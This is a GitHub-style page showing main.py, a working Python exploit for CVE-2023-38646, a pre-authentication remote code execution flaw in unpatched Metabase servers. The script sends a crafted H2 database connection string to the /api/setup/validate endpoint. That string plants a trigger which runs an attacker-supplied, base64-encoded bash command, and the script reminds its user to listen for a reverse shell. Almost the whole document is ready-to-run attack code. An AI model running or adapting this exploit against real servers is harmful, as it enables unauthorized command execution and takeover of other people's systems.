-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathmain.py
59 lines (40 loc) · 2.04 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
from argparse import ArgumentParser
from string import ascii_uppercase
import base64
import random
import requests
def encode_command_to_b64(payload: str) -> str:
encoded_payload = base64.b64encode(payload.encode('ascii')).decode()
equals_count = encoded_payload.count('=')
if equals_count >= 1:
encoded_payload = base64.b64encode(f'{payload + " " * equals_count}'.encode('ascii')).decode()
return encoded_payload
parser = ArgumentParser('Metabase Pre-Auth RCE Reverse Shell', 'This script causes a server running Metabase (< 0.46.6.1 for open-source edition and < 1.46.6.1 for enterprise edition) to execute a command through the security flaw described in CVE 2023-38646')
parser.add_argument('-u', '--url', type=str, required=True, help='Target URL')
parser.add_argument('-t', '--token', type=str, required=True, help='Setup Token from /api/session/properties')
parser.add_argument('-c', '--command', type=str, required=True, help='Command to be execute in the target host')
args = parser.parse_args()
print('[!] BE SURE TO BE LISTENING ON THE PORT YOU DEFINED IF YOU ARE ISSUING AN COMMAND TO GET REVERSE SHELL [!]\n')
print('[+] Initialized script')
print('[+] Encoding command')
command = encode_command_to_b64(args.command)
url = f'{args.url}/api/setup/validate'
headers = {
"Content-Type": "application/json",
"Connection": "close"
}
payload = {
"token": args.token,
"details": {
"details": {
"db": "zip:/app/metabase.jar!/sample-database.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER {random_string} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {{echo,{command}}}|{{base64,-d}}|{{bash,-i}}')\n$$--=x".format(random_string = ''.join(random.choice(ascii_uppercase) for i in range(12)), command=command),
"advanced-options": False,
"ssl": True
},
"name": "x",
"engine": "h2"
}
}
print('[+] Making request')
request = requests.post(url, json=payload, headers=headers)
print('[+] Payload sent')